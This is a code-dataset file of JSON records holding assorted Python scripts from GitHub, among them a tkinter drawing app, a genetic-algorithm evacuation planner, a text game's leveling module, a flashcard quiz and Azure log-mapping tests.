+{"seq_id":"15964757448","text":"import tkinter\n\n\ndef f(event):\n c.create_oval((event.x - 10,event.y - 10), (event.x + 10,event.y + 10), fill=color)\n\n\ndef keypress(event):\n global color\n if event.keysym == \"r\":\n color = \"red\"\n if event.keysym == \"g\":\n color = \"green\"\n if event.keysym == \"b\":\n color = \"blue\"\n\n\nw = tkinter.Tk()\ncolor = \"red\"\nc = tkinter.Canvas(width=500, height=500, background=\"white\")\nc.pack()\nc.bind(\"\", f)\nw.bind(\"\", keypress)\nw.mainloop()\n","repo_name":"yandex-lyceum-yakovlev/tkProject2","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37448544670","text":"# -*- coding: utf-8 -*-\nimport geatpy as ea # import geatpy\nimport numpy as np\nimport random\nB=3\nR=6 #此语义下隐含条件 R必须为偶数\nY=1\nS=3\nT=3\nN=Y+S+T\n# 编号规则 稍后补充Dij的自动生成算法\n# 从0开始编号,编号顺序 Y~S~T\nDij=np.array([[0,7,4,9,0,0,0],\n [7,0,0,0,6,7,8],\n [4,0,0,0,10,9,2],\n [9,0,0,0,6,3,7],\n [0,6,10,6,0,0,0],\n [0,7,9,3,0,0,0],\n [0,8,2,7,0,0,0]])\n# d=np.array([[6,7,8],\n# [10,9,2],\n# [6,3,7]])\n# dStart=np.array([7,4,9])\nL=np.array([1,3,3])\nU=np.array([4,4,1])\nNind=50\ncount=1\n\nclass MyProblem(ea.Problem): # 继承Problem父类\n def __init__(self):\n name = 'MyProblem' # 初始化name(函数名称,可以随意设置)\n M = 1 # 初始化M(目标维数)\n maxormins = [1] # 初始化maxormins(目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标)\n # Dim = B*R*S*T # 初始化Dim(决策变量维数)\n Dim = N * N * (B + R) # 初始化Dim(决策变量维数)\n varTypes = [1] * Dim # 初始化varTypes(决策变量的类型,元素为0表示对应的变量是连续的;1表示是离散的)\n lb = [0] * Dim # 决策变量下界\n ub = [2] * Dim# 决策变量上界\n lbin = [1] * Dim # 决策变量下边界(0表示不包含该变量的下边界,1表示包含)\n ubin = [1] * Dim # 决策变量上边界(0表示不包含该变量的上边界,1表示包含)\n # 调用父类构造方法完成实例化\n ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)\n def calReferObjV(self): # 设定目标数参考值(本问题目标函数参考值设定为理论最优值)\n referenceObjV = np.array([[23]])\n return referenceObjV\n\n def aimFunc(self, pop): # 目标函数\n global count\n print(str(count)+\":\",end=\"\")\n count+=1\n\n Yijb = pop.Phen[:,:N*N*B].reshape([Nind, N, N, B]).astype(int) # 得到决策变量矩阵Xijb\n Xijr = pop.Phen[:,N*N*B:].reshape([Nind, N, N, R]).astype(int) # 得到决策变量矩阵Xijr\n l = list(range(Y)) + list(range(Y + S, N))\n\n # 目标函数\n TmaxMin = np.zeros((Nind, B), dtype=np.int) # b # 40*b(40*3)\n for b in range(B):\n for i in range(Y):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(S):\n for j in l:\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(N):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n\n #PPT式1\n CV1=abs(Xijr.sum(axis=3)-Yijb.sum(axis=3)).sum(axis=(1,2)).reshape(Nind,1)\n\n # PPT式2\n preCV2 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV2[:, :] -= Yijb.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV2 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV2[q] += abs(preCV2[q][i])\n\n\n # PPT式3\n preCV3 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV3[:, :] -= Yijb.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV3 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV3[q][j] < 0:\n CV3[q] -= preCV3[q][j]\n\n # PPT式4\n preCV4 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV4[:, :] -= Xijr.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV4 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV4[q] += abs(preCV4[q][i])\n\n # PPT式5\n preCV5 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV5[:, :] -= Xijr.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV5 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV5[q][j] < 0:\n CV5[q] -= preCV5[q][j]\n\n # PPT式6 有问题 待修改\n # CV6 = np.zeros((Nind, 1), dtype=np.int)\n # for n in range(Nind):\n # for r in range(R-1):\n # tmpSum=0\n # for i in range(S):\n # for j in range(T):\n # tmpSum+=Xijr[n][i+Y][j+Y+S][r]-Xijr[n][i+Y][j+Y+S][r+1]\n # if tmpSum<0:\n # CV6[n]-=tmpSum\n\n #纸式1\n CV7 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for r in range(R-1):\n tmpSum=0\n for i in l:\n tmpSum += Xijr[n][i][j + Y][r] - Xijr[n][j + Y][i][r + 1]\n # if 
tmpSum!=0:\n CV7[n]+=abs(tmpSum)\n\n #纸式2\n CV8 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for r in range(R-1):\n tmpSum=0\n for i in range(S):\n tmpSum += Xijr[n][i+Y][j + Y+S][r] - Xijr[n][j + Y+S][i+Y][r + 1]\n if tmpSum<0:\n CV8[n]-=tmpSum\n\n #纸式3\n CV9 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for r in range(R):\n tmpSum=0\n for i in range(S):\n for j in range(T):\n tmpSum+=Xijr[n][i+Y][j+Y+S][r]\n if tmpSum>B:\n CV9[n]+=tmpSum-B\n\n # 纸式4\n CV10 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for b in range(B):\n tmpSum = 0\n for i in range(S):\n for j in range(T):\n tmpSum += Yijb[n][i + Y][j + Y + S][b]\n if tmpSum > R:\n CV10[n] += tmpSum - R\n\n # 纸式5\n CV11 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for i in l:\n CV11[n]+=abs(Xijr[n][i][j+Y][R-1])\n\n # 纸式6\n CV12 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for b in range(B):\n tmpSum=0\n for i in l:\n tmpSum+=Yijb[n][i][j+Y][b]-Yijb[n][j+Y][i][b]\n # if tmpSum!=0:\n CV12+=abs(tmpSum)\n\n # 纸式7\n CV13 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for b in range(B):\n tmpSum=0\n for i in range(S):\n tmpSum += Yijb[n][i+Y][j + Y+S][b] - Yijb[n][j + Y+S][i+Y][b]\n if tmpSum<0 or tmpSum>1:\n CV13[n]+=abs(tmpSum)\n\n pop.ObjV = np.max(TmaxMin, axis=1).reshape(Nind, 1) # 计算目标函数值,赋值给pop种群对象的ObjV属性\n pop.CV=np.hstack([CV1,CV2,CV3,CV4,CV5,CV7,CV8,CV9,CV10,CV11,CV12,CV13])\n\n print(pop.CV.sum()//NIND)\n\n\ndef initData():\n L = np.ones(3)\n U = np.zeros(3) #初始化\n while (L.sum() > U.sum()): #防止生成的数据本身无法满足救援条件\n B = random.randint(2, 5)\n R = random.randint(2, 5)\n S = random.randint(2, 5)\n T = random.randint(2, 5)\n d = np.random.randint(1, 11, size=(S, T))\n dStart = np.random.randint(1, 11, size=S)\n L = np.random.randint(1, 6, size=S)\n U = np.random.randint(1, 6, size=T)\n print('本次基因长度为 %d ,随机生成的变量值为:'%(S*T*B*R))\n print(' | S | T | B | R | ')\n print('---------------------------')\n print(\" | \", S, \" | \", T, \" | \", B, \" | \", R, \" | \")\n print('Source 与 Sink 间距离矩阵')\n print(d)\n print('Single Yard 与各个 Source 间距离矩阵')\n print(dStart)\n print('%d 个 Source 的待救援者人数分别为' % S)\n print(L)\n print('%d 个 Sink 的最大容量分别为' % T)\n print(U)\n\nif __name__ == '__main__':\n \"\"\"==============================随机生成原始数据==========================\"\"\"\n # initData()\n \"\"\"===============================实例化问题对象===========================\"\"\"\n problem = MyProblem() # 生成问题对象\n \"\"\"=================================种群设置==============================\"\"\"\n Encoding = 'RI' # 编码方式\n NIND = Nind # 种群规模\n Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器\n population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)\n \"\"\"===============================算法参数设置=============================\"\"\"\n myAlgorithm = ea.soea_SEGA_templet(problem, population) # 实例化一个算法模板对象\n myAlgorithm.recOper = ea.Xovdp(XOVR=0.9, Parallel=True) # 设置交叉算子\n myAlgorithm.mutOper = ea.Mutinv(Pm=0.05, Parallel=True) # 设置变异算子\n\n # myAlgorithm = ea.soea_DE_rand_1_L_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm = ea.soea_DE_currentToBest_1_bin_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm.mutOper.F = 0.7 # 差分进化中的参数F\n # myAlgorithm.recOper.XOVR = 0.7 # 重组概率\n\n myAlgorithm.MAXGEN = 200 # 最大进化代数\n myAlgorithm.logTras = 1 # 设置每隔多少代记录日志,若设置成0则表示不记录日志\n myAlgorithm.verbose = True # 设置是否打印输出日志信息\n 
myAlgorithm.drawing = 1 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制目标空间过程动画;3:绘制决策空间过程动画)\n \"\"\"===========================根据先验知识创建先知种群========================\"\"\"\n # prophetChrom = np.zeros([NIND,N * N * (B+R)],dtype=np.int)\n\n tmpProp1=np.zeros([N ,N ,B],dtype=np.int)\n tmpProp1[0][1][0]=tmpProp1[1][4][0]=tmpProp1[4][3][0]=tmpProp1[3][5][0]=tmpProp1[0][2][1]=tmpProp1[2][4][1]=tmpProp1[4][3][1]=tmpProp1[3][5][1]=tmpProp1[0][2][2]=tmpProp1[2][6][2]=tmpProp1[6][2][2]=tmpProp1[2][5][2]=tmpProp1[5][3][2]=tmpProp1[3][5][2]=1\n tmpProp2 = np.zeros([N, N, R], dtype=np.int)\n tmpProp2[0][1][0]=tmpProp2[1][4][1]=tmpProp2[2][4][1]=tmpProp2[2][6][1]=tmpProp2[6][2][2]=tmpProp2[2][5][3]=tmpProp2[5][3][4]=tmpProp2[3][5][5]=1\n tmpProp2[0][2][0]=tmpProp2[4][3][2]=tmpProp2[3][5][3]=2\n tmpProp=np.append(tmpProp1,tmpProp2)\n prophetChrom = np.stack([np.array(tmpProp) for _ in range(Nind)], axis=0)\n\n prophetPop=ea.Population(Encoding, Field, NIND,prophetChrom)\n myAlgorithm.call_aimFunc(prophetPop) # 计算先知种群的目标函数值及约束(假如有约束)\n \"\"\"==========================调用算法模板进行种群进化========================\"\"\"\n [BestIndi, population] = myAlgorithm.run(prophetPop) # 执行算法模板,得到最优个体以及最后一代种群\n # [BestIndi, population] = myAlgorithm.run() # 执行算法模板,得到最优个体以及最后一代种群\n BestIndi.save() # 把最优个体的信息保存到文件中\n \"\"\"=================================输出结果==============================\"\"\"\n print('评价次数:%s' % myAlgorithm.evalsNum)\n print('时间已过 %s 秒' % myAlgorithm.passTime)\n if BestIndi.sizes != 0:\n print('最优的目标函数值为:%s' % BestIndi.ObjV[0][0])\n print('最优的控制变量值为:')\n for i in range(BestIndi.Phen.shape[1]):\n print(BestIndi.Phen[0, i],end=\" \")\n print(\"\")\n # print('最优的i,j,b,r值为:')\n # print(' | b | r | i | j | ')\n # print('---------------------------')\n # Xijbr=BestIndi.Phen.reshape(3,3,3,3)\n # for b in range(B):\n # for r in range(R):\n # for i in range(S):\n # for j in range(T):\n # if(Xijbr[i][j][b][r]==1):\n # print(\" | \",b+1,\" | \",r+1,\" | \",i+1,\" | \",j+1,\" | \")\n else:\n print('没找到可行解。')","repo_name":"aspxcor/Optimization-Plan-for-Emergency-Evacuation-of-Personnel-Based-on-Optimization-Algorithm","sub_path":"Code/Problem1/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"70129675210","text":"def solution(n, costs):\n \n def find_set(x):\n if x != parent[x]:\n parent[x] = find_set(parent[x])\n return parent[x]\n \n costs.sort(key=lambda x: x[2])\n parent = list(range(n))\n count, cost = 0, 0\n for s, e, w in costs:\n s_root, e_root = find_set(s), find_set(e)\n if s_root != e_root:\n parent[e_root] = s_root\n cost += w\n count += 1\n if count >= n-1:\n break\n return cost","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"Programmers/Level3/섬연결하기.py","file_name":"섬연결하기.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13312522172","text":"\n# 3. multiple user input in dictionary using while loop\n\nuser_vacations = {}\n\nactive_polling = True\nprompt1 = \"what is your name? \"\nprompt2 = \"If you could visit one place in the world, where would you go? \"\nprompt3 = \"Would you like to continue for other? (yes | no) \"\nwhile active_polling:\n\tuser_name = input(prompt1.title())\n\tdream_vacation = input(prompt2.title())\n\t\n\tuser_vacations[user_name] = dream_vacation\n\t\n\trepeat = input(prompt3.title())\n\tif repeat == 'no':\n\t\tactive_polling = False\n\nprint(\"\\n----- RESULTS OF THE POLL ------\\n\")\nfor name, vacation in user_vacations.items():\n\tprint(name.title() + \" has a dream of visiting \" + vacation.title() + \".\")\n","repo_name":"huzaifabaloch/Python_Crash_Book_Exercises","sub_path":"Chap_7 - User Input And While Loop/7_10_dream_vacation.py","file_name":"7_10_dream_vacation.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38502336034","text":"\"\"\"\n Main script for application.\n\"\"\"\n\n__author__ = ['Bhavik Patel']\n__version__ = \"1.0.0\"\n\nfrom my_app import app\n\n\ndef main():\n # init main object\n print(\"Initializing script..\")\n obj = app.App()\n\n print(\"Running app..\")\n obj.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bhvikp/pyspark-skeleton","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22928962916","text":"from some_model import SomeModel\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n score: float = model.predict(message)\n\n if good_thresholds > 1.0 or good_thresholds < 0.0:\n raise ValueError('good_thresholds must be in range [0.0 , 1.0]')\n\n if bad_thresholds > 1.0 or bad_thresholds < 0.0:\n raise ValueError('bad_thresholds must be in range [0.0 , 1.0]')\n\n if good_thresholds < bad_thresholds:\n raise ValueError('good_thresholds must be greater than bad_thresholds')\n\n if score < bad_thresholds:\n return 'неуд'\n elif score > good_thresholds:\n return 'отл'\n else:\n return 'норм'\n","repo_name":"genusB/made_advance_python","sub_path":"advance_07/predict_message_mood.py","file_name":"predict_message_mood.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2474574143","text":"\"\"\"\nFiona Wong\n\nMaddelin Maddelin\n\"\"\"\nfrom game_creation import ascii_art\n\n\ndef character_has_leveled(character: dict, level_chart: dict) -> bool:\n \"\"\"\n Return True if character has leveled up based on a dictionary of set level EXP, else False.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :param level_chart: a dictionary that contains the attainable levels and the EXP value required for each level\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :return: True if character has leveled up based on a dictionary of set level EXP, else False\n\n >>> test_character = {'Name': 'Hunter', 'Partner Name': 'Killua', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 0}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n False\n >>> test_character = {'Name': 'Raon', 'Partner Name': 'Gon', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 125}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n True\n \"\"\"\n result = False\n next_exp = level_chart[character['LEVEL'] + 1]\n if character['LEVEL'] and character['EXP'] >= next_exp:\n result = True\n return result\n\n\ndef display_level_chart() -> dict:\n \"\"\"\n Create and print a dictionary that contains the attainable levels and the EXP value required for each level.\n\n :postcondition: creates and prints a dictionary that contains the attainable levels and the EXP value required for\n each level.\n :return: a dictionary that contains the attainable levels and the EXP value required for each level\n\n >>> level_chart = display_level_chart()\n >>> level_chart\n {1: 100, 2: 200, 3: 300, 4: 400, 5: 500, 6: 600, 7: 700, 8: 800, 9: 900, 10: 1000}\n \"\"\"\n return {level: exp for level, exp in enumerate(range(100, 1100, 100), start=1)}\n\n\ndef execute_glow_up_protocol(character: dict) -> None:\n \"\"\"\n Display the corresponding ASCII art and increment the character level by 1 and HP by 100.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :postcondition: displays the corresponding ASCII art and increments the character level by 1 and HP by 100\n\n >>> test_character = {'Name': 'Jess', 'Partner Name': 'Bess', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 
'HP': 100, 'EXP': 25}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n \n Current Status:\n LEVEL: 2\n HP: 300\n EXP: 25\n \n\n >>> test_character = {'Name': 'Hiu', 'Partner Name': 'Paus', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 3,\n ... 'HP': 1, 'EXP': 125}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n \n Current Status:\n LEVEL: 4\n HP: 201\n EXP: 125\n \n \"\"\"\n ascii_art.level_up_message()\n character['LEVEL'] += 1\n character['HP'] += 200\n print(f\"\\tCurrent Status:\\n\"\n f\"\\tLEVEL: {character['LEVEL']}\\n\"\n f\"\\tHP: {character['HP']}\\n\"\n f\"\\tEXP: {character['EXP']}\\n\")\n","repo_name":"Maddelin/revival-A4-1510","sub_path":"character_information/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72762500808","text":"\"\"\"\nPlot the entropy of user usages by county.\n\n\"\"\"\n\nimport sys\nimport twitterproj\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef collect_data():\n count = sys.argv[1]\n style = sys.argv[2]\n normalized = bool(int(sys.argv[3]))\n\n ents = twitterproj.userentropy__counties(count, style, normalized=normalized)\n fn = \"userentropies_{0}_{1}_{2}.json\"\n if normalized:\n fn = fn.format(count, style, 'norm')\n else:\n fn = fn.format(count, style, 'nonorm')\n\n with open(fn, 'w') as f:\n json.dump(ents, f)\n\ndef plot():\n numTweets_count = json.load(open('userentropies_numTweets_count_norm.json'))\n numTweetsWithHashtags_count = json.load(open('userentropies_numTweetsWithHashtags_count_norm.json'))\n\n numTweets_count_nonorm = json.load(open('userentropies_numTweets_count_nonorm.json'))\n numTweetsWithHashtags_count_nonorm = json.load(open('userentropies_numTweetsWithHashtags_count_nonorm.json'))\n\n population = json.load(open('json/grids.counties.bot_filtered.respop72013.json'))\n\n counties = list(numTweets_count.keys())\n\n w = [numTweets_count[geoid] for geoid in counties]\n x = [numTweetsWithHashtags_count[geoid] for geoid in counties]\n y = [numTweets_count_nonorm[geoid] for geoid in counties]\n z = [numTweetsWithHashtags_count_nonorm[geoid] for geoid in counties]\n c = [population[geoid] for geoid in counties]\n\n #matplotlib.style.use('fivethirtyeight')\n import seaborn\n\n f, (ax1, ax2) = plt.subplots(1,2)\n ax1.scatter(w, x, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n cax = ax2.scatter(y, z, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n\n ax1.set_xlabel('Normalized User Entropy of Tweets')\n ax1.set_ylabel('Normalized User Entropy of Hashtagged Tweets')\n ax1.set_xlim(0.0001, 0.15)\n ax1.set_ylim(0.0001, 0.15)\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax2.set_xlabel('User Entropy of Tweets')\n ax2.set_ylabel('User Entropy of Hashtagged Tweets')\n\n cb = f.colorbar(cax)\n cb.set_label(\"Log Population\")\n\n f.savefig('UserEntropyByCounty.pdf')\n\nplot()\n#collect_data()\n","repo_name":"chebee7i/twitter","sub_path":"scripts/userentropies.py","file_name":"userentropies.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"10893286819","text":"from random import *\r\n\r\ndef main():\r\n \r\n choice = input(\"Just 'p'orts, 'i'p, 't'ransmisisson, 's'tandards, or study 'e'verything?\")\r\n\r\n if choice.lower() == \"p\":\r\n flashcards = open(\"ports.txt\", \"r\")\r\n elif choice.lower() == \"i\":\r\n flashcards = open(\"ip.txt\")\r\n elif choice.lower() == \"t\":\r\n flashcards = open(\"transmission.txt\")\r\n elif choice.lower() == \"s\":\r\n flashcards = open(\"standards.txt\")\r\n else:\r\n flashcards = open(\"flashcards.txt\", \"r\")\r\n\r\n flashDict = {}\r\n flashKeys = []\r\n wrongKeys = []\r\n done = False\r\n count = 0\r\n\r\n for card in flashcards:\r\n question, answer = card.split(\",\")\r\n answer = answer.strip(\"\\n\")\r\n flashDict[question] = answer.lower()\r\n\r\n for key in flashDict.keys():\r\n flashKeys.append(key)\r\n\r\n for i in range(len(flashKeys) - 1):\r\n num = randrange(0, (len(flashKeys) - 1))\r\n flashKeys[i], flashKeys[num] = flashKeys[num], flashKeys[i]\r\n\r\n for question in flashKeys:\r\n questionStr = question + \": \"\r\n answer = input(questionStr)\r\n\r\n if answer.lower() in flashDict[question]:\r\n print(\"CORRECT!\\n\")\r\n count = count + 1\r\n else:\r\n print(\"Incorrect! Answer: \", flashDict[question], \"\\n\")\r\n wrongKeys.append(question)\r\n \r\n print(\"You got: \", count, \"correct out of \", len(flashDict))\r\n print(\"Work on: \")\r\n\r\n for key in wrongKeys:\r\n print(key)\r\n \r\nmain()\r\n","repo_name":"duncan-mcfarland/flashcards","sub_path":"NetworkPlus.py","file_name":"NetworkPlus.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16015299861","text":"from logs_ingest.mapping import extract_resource_id_attributes, RESOURCE_ID_ATTRIBUTE, SUBSCRIPTION_ATTRIBUTE, \\\n RESOURCE_GROUP_ATTRIBUTE, RESOURCE_TYPE_ATTRIBUTE, RESOURCE_NAME_ATTRIBUTE\n\n\ndef test_extract_resource_id_simple_resource_id():\n run_successful_extraction_test(\n resource_id=\"subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-adagze/providers/Microsoft.Maps/accounts/maps-hackaton-test\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-adagze\",\n expected_resource_type=\"Microsoft.Maps/accounts\",\n expected_resource_name=\"maps-hackaton-test\"\n )\n\n\ndef test_extract_resource_id_attributes_nested_resource_type():\n run_successful_extraction_test(\n resource_id=\"/subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-jelpet\",\n expected_resource_type=\"Microsoft.NetApp/netAppAccounts/capacityPools\",\n expected_resource_name=\"cappool-jelpet-just-trying\"\n )\n\n\ndef test_extract_resource_id_attributes_invalid_resource_id():\n result_dict = {}\n resource_id = \"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\"\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict == {RESOURCE_ID_ATTRIBUTE: resource_id}\n\n\ndef run_successful_extraction_test(\n resource_id: str,\n expected_subscription: str,\n expected_resource_group: str,\n expected_resource_type: str,\n expected_resource_name: str\n):\n result_dict = {}\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict[SUBSCRIPTION_ATTRIBUTE].casefold() == expected_subscription.casefold()\n assert result_dict[RESOURCE_GROUP_ATTRIBUTE].casefold() == expected_resource_group.casefold()\n assert result_dict[RESOURCE_TYPE_ATTRIBUTE].casefold() == expected_resource_type.casefold()\n assert result_dict[RESOURCE_NAME_ATTRIBUTE].casefold() == expected_resource_name.casefold()\n","repo_name":"dynatrace-oss/dynatrace-azure-log-forwarder","sub_path":"tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"}
+{"seq_id":"32428544591","text":"#Replace all occurences of BLANK with appropriate terms in the code below to make it work!\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\nclass Instructor:\n \"\"\"\n Class for a Instructor Object that can teach courses\n \"\"\"\n def __init__(self, name):\n print(\"Initializing Instructor object for name \", name)\n self._name = name\n #_courses_enrolled will be the data member which is a collection of objects\n self._courses_enrolled = []\n\n def teach_course(self, class_name):\n print(\"Teaching course\", class_name.get_name())\n #add course to the _courses_enrolled collection\n self._courses_enrolled.append(class_name)\n\n def print_courses(self):\n print(\"Courses this Instructor is going to teach: \")\n for course in self._courses_enrolled:\n print(course.get_name())\n\n#create objects\ninstructor_1 = Instructor(\"ABC\")\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\n#now call methods\ninstructor_1.teach_course(cs161_course)\ninstructor_1.teach_course(cs162_course)\ninstructor_1.print_courses()\n\n#Debug and fix this piece of code to make it work\n\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\nlist_of_courses = {cs161_course, cs162_course}\n\ndictionary_of_courses = {\"CS161\":cs161_course, \"CS162\": cs162_course}\nprint(dictionary_of_courses['CS161'].get_name())\nprint(dictionary_of_courses['CS162'].get_name())","repo_name":"BrianDy255/HelloWorld","sub_path":"CS 161/Week 10/Exploration Objects Inside Collections Exercise.py","file_name":"Exploration Objects Inside Collections Exercise.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
